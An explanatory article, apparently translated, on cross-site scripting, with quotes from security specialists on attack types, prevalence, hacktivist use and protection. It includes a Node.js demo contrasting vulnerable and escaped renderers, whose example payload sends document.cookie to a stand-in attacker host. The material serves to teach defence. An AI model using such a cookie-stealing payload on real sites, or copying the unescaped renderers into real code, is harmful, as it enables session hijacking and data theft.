Cross-site scripting (XSS): what is it, how does it work, and how do you protect against it?

Father

Table of contents
  1. How cross-site scripting works
  2. How common are XSS vulnerabilities?
  3. Cross-site scripting and hacktivism
  4. How to protect yourself from cross-site scripting
  5. Conclusion

Cross-site scripting (XSS) is a type of attack in which malicious scripts are injected into the content of a website. This lets an attacker use a site the user trusts for the attacker's own purposes, from stealing data to serving ads.

Depending on the attacker's setup and goals, cross-site scripting can be used to hijack user sessions, redirect the user to malicious sites, deliver malware, or simply monitor user activity.

In this article, we will look at the main XSS techniques, the reasons for the "popularity" of XSS exploitation among hackers, ways to protect the user, and the potential damage a hacker can cause during an XSS attack.

How cross-site scripting works

Cross-site scripting as an attack technique relies on a vulnerability in some public service that can be used to inject malicious code (a script). As a rule, such injections are detected only after the fact, once the first users have suffered losses from interacting with the compromised site and have reported it to the site's support team.

Alexander Chernyakov
Leading Information Security Analyst at the Innostage CyberART Center for Countering Cyber Threats

The sites most vulnerable, or most dangerous, from the point of view of cross-site scripting are those that use JavaScript and, in one way or another, have user input fields where the user can enter arbitrary data. Taking all of the above into account, we can conclude that quite a large proportion of websites on the Internet are potentially vulnerable to XSS attacks.

The more fields a user can interact with on a site, the more likely that site is to be dangerous from the point of view of cross-site scripting. This includes various forums and online chats, where anyone can leave a message or start a topic.

A striking example is the situation with the chat of Twitch, the video streaming service popular among gamers. During one broadcast, a user with the nickname Hexxyr discovered that the Twitch web application did not validate what users typed into the chat. The broadcast chat turned into a real free-for-all at one point, where each of the hundreds of viewers could write a small piece of JS code in a message and have it displayed on the screens of everyone watching the broadcast. It is fortunate that this had no disastrous consequences. But if big players like Twitch make such mistakes, what can we expect from other developers?

There are two main types of XSS:

1) Persistent, or stored, XSS. On the one hand, this type is less common, since it demands more skill from the attacker. On the other hand, it is much more dangerous, because the attacker gets to plant the malicious code on the site's server, and the script is then triggered every time the page is requested.

2) Non-persistent, or reflected, XSS. It is far more common and less "demanding" of the attacker's skills. However, to carry out this type of attack, the user must visit a specially crafted link that the attacker has to distribute.

A number of experts also single out DOM-based XSS as a separate group: the payload does not appear in the HTML returned by the server, which makes it harder to detect, but the vulnerability is exploited entirely on the client side, and so it is of little use for mass distribution.
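The following is an added example, not code from the original article or from Twitch: a small Node.js model of the three XSS classes just described. Each "render" function returns the HTML string that a page would serve, or that a DOM sink such as innerHTML would receive; nothing is executed in a browser here. The pages, the comment store, the search route and the payload are all constructed for illustration, and the stored-XSS "database" is an in-memory array.

```javascript
// Added example: models reflected, stored and DOM-based XSS in plain Node.js.
// All pages, routes and the payload below are constructed for illustration.

// Minimal HTML-text-context encoder (the five characters that matter there).
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));

// Constructed attacker payload, as it would appear in a query string or comment.
const PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// 1) Reflected XSS: the search term from the URL goes straight into the response.
//    The victim has to open a crafted link such as /search?q=<payload>.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// 2) Stored XSS: the payload is saved server-side once and served to every
//    visitor of the page; no link has to be distributed.
const comments = []; // constructed in-memory "database"
function postComment(text) {
  comments.push(text);
}
function renderCommentsVulnerable() {
  return comments.map((c) => `<li>${c}</li>`).join('');
}
function renderCommentsSafe() {
  return comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('');
}

// 3) DOM-based XSS: the server's HTML is clean; client-side code reads an
//    attacker-controlled part of the URL (the fragment, which never reaches the
//    server) and writes it into an HTML sink. In a browser this would be
//    `el.innerHTML = domSinkVulnerable(location.hash)`.
function domSinkVulnerable(hash) {
  const name = decodeURIComponent(hash.slice(1));
  return `Welcome back, ${name}`; // value destined for innerHTML
}
function domSinkSafe(hash) {
  const name = decodeURIComponent(hash.slice(1));
  // Writing to textContent instead of innerHTML never parses markup; the
  // explicit escaping here stands in for that safe sink.
  return escapeHtml(`Welcome back, ${name}`);
}

// Does the rendered HTML still contain an executable script tag? Sufficient for
// this illustration only; it is not a real XSS detector.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run all six cases and report which ones would execute the payload.
function demo() {
  comments.length = 0;
  postComment('Nice article!');
  postComment(PAYLOAD);
  const hash = '#' + encodeURIComponent(PAYLOAD);
  const cases = {
    reflectedVulnerable: renderSearchVulnerable(PAYLOAD),
    reflectedSafe: renderSearchSafe(PAYLOAD),
    storedVulnerable: renderCommentsVulnerable(),
    storedSafe: renderCommentsSafe(),
    domVulnerable: domSinkVulnerable(hash),
    domSafe: domSinkSafe(hash),
  };
  for (const [name, html] of Object.entries(cases)) {
    console.log(`${name.padEnd(20)} script executes: ${containsScriptTag(html)}`);
  }
  return cases;
}

demo();
```

Running it prints six lines; the three "Vulnerable" cases report that the script tag survives, the three "Safe" cases do not. The fix in all three cases is the same in principle, encode for the context at the exact point where untrusted data meets markup, but where the data comes from (URL, database, or the client's own location object) is what separates the three classes.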

Evgeny Kravtsov
Senior Frontend Developer, SberDevices

Sites that do not sufficiently check incoming data and lack reliable mechanisms to protect against cross-site scripting (XSS) are the most vulnerable. Examples of such sites include:

1. Social networks like Facebook and Twitter, where users can enter their own data and share links.
2. Forums and blogs where users can post their own posts and comments.
3. Sites with dynamic content, such as news sites or online stores, where users can enter information into forms and place ads.

It is important to note that even large and well-known sites can be vulnerable to XSS attacks, as this is one of the most common vulnerabilities on the Internet.

By exploiting XSS, an attacker can:
  • redirect the user to malicious sites;
  • steal cookies and other data;
  • track user actions (for example, using a keylogger);
  • steal the session token and take control of the session;
  • infect the user's device.

The potential capabilities of an attacker carrying out an XSS attack are quite extensive. A significant advantage of this type of attack is that it lends itself to mass attacks, which is especially attractive to hacktivists.

How common are XSS vulnerabilities?

It is important to understand that no public resource can be one hundred percent protected from cross-site scripting. At the same time, there are many ways to significantly reduce the number of XSS vulnerabilities, the first of which is to adopt a secure development lifecycle.

Alexander Zubrikov
General Director ITGLOBAL.COM Security

XSS is quite common on the Internet. This vulnerability is included in the OWASP Top 10 every year. The list is regularly updated so that it always reflects the ten most serious risks facing organizations. Together with other injections, XSS is ranked 3rd. You can also turn to HackerOne for statistics. For example, its 2020 report shows that about 23% of all vulnerabilities found are XSS-related.

As for the complexity of exploitation, there is very wide variation. There are both complex cases with many restrictions on exploitation and the simplest ones that are exploited "straight out of the textbook". But if you try to average it out, exploiting XSS is not difficult.

In the classic development cycle, efficiency is considered the key "measure" of a developer's success: the faster, more stable and more optimized your application, the better. As a rule, developers "insure" the service against accidental user actions and rarely factor in the risk that the site will attract the attention of a "young bracket-thrower" or of real hackers.

However, as awareness of cyber risks grows, more and more companies are coming to understand that cybersecurity is critical to their business processes. In some industries, XSS vulnerabilities are an order of magnitude harder to find simply because those industries have always been a likely target for hackers; the banking sector, and the financial sector as a whole, are examples.

Cross-site scripting and hacktivism

In the past year, hacktivism has become widespread. Many researchers have noted that hacktivists have "leveled up" their skills over a year of practice and will, with a high degree of probability, master new attack vectors and tools in the coming year.

In this context, cross-site scripting is attractive for several reasons:

1. Scale. Searching for and studying targets can be spread across a large number of people.

2. Automation. There are scanners (for example, XSStrike) that find typical vulnerabilities "with one click", and there is ready-made exploitation software (BeEF), as well as exploits that "more experienced colleagues" can share.

3. Relative simplicity. Reflected XSS is well suited to mass adoption by people with "non-core" skills who are just starting out in hacking.

4. Opportunities for demonstration. Resources that are of no interest to "commercial" hackers, because compromising them is hard to monetize, are quite suitable for hacktivists to make political statements and present their ideas to a wider audience.

XSS is one of the techniques hacktivists are most likely to master. This year we can probably expect "signature" malicious scripts to appear from the leading hacktivist communities.

How to protect yourself from cross-site scripting

The difficulty of protection, from the site owner's point of view, is that a site is not always a company or a commercial project, and so it may have no information security budget at all even though its user base may be large.

Vladimir Zuev
Head of MegaFon's Commercial SOC

It is quite easy to find a suitable site for a malicious attack, so web application owners need to pay attention to controlling incoming data and to use overlay security tools, starting at the level of business process design.

You can minimize the vulnerability of sites by using MegaFon's WAF (Web Application Firewall) service, which helps filter attempts to attack the site, including at the application level. A pentest conducted by a professional team allows you to analyze the resource at different levels, identify vulnerabilities in the operating system, databases and applications, and produce a detailed report on the severity of the identified vulnerabilities and how to fix them.

At the advanced level there is an integrated approach: a combination of measures at all stages of the life cycle and the application of secure development practices.

From a business perspective, the first steps are to audit the source code and adopt SSDLC practices. For companies that are mature in terms of information security, it makes sense to use a range of security analysis tools, from a pentest to participation in a bug bounty program. As for user safety, the main ways to protect yourself are awareness and attentiveness.

Sergey Neyronov
CIO AtreIdea

Users can protect themselves from cross-site scripting attacks in the following ways:

1. Use a reliable browser. Most modern browsers contain security features that can protect against some XSS.
2. Use browser add-ons. Browser add-ons such as NoScript can block unsafe scripts and also protect you from XSS.
3. Keep software updated. It is important to make sure that your browser is updated promptly, as the latest versions constantly improve their protection mechanisms, including against such problems.

For the user, the recommendations for protecting against cross-site scripting differ little from the standard rules of digital hygiene, which long ago stopped being mere recommendations and became a mandatory requirement for safe use of the Internet.

Conclusion

Cross-site scripting and XSS vulnerabilities have for several years been at the top of the rankings of the most dangerous and most relevant vulnerabilities compiled by leading industry companies and research agencies.

The main protection against XSS from the user's point of view is constant attention to links, since you can run into it even on the most popular and trusted resource.

Valery Stepanov
Head of the Competence Center for Information Security T1 Integration

One of the easiest ways to protect yourself from cross-site scripting attacks is to carefully check the links you click on when browsing the web or in the body of emails. You need to be vigilant: for example, if you see a link that looks like http://yandx-1.ru, it is very likely that an attacker is trying to convince the user that they are going to a well-known site.

With hacktivism growing in popularity, the risks associated with XSS exploitation are only increasing. Its relative simplicity, the availability of automation for both discovery and exploitation, and, most importantly, the fact that it gives a large number of people somewhere to apply their efforts all suggest that the number of attacks using this technique will only grow.

At the same time, XSS attacks give an attacker a wide range of opportunities, from displaying content that is undesirable for the user to stealing data, infecting a PC, or gaining control over the victim's account.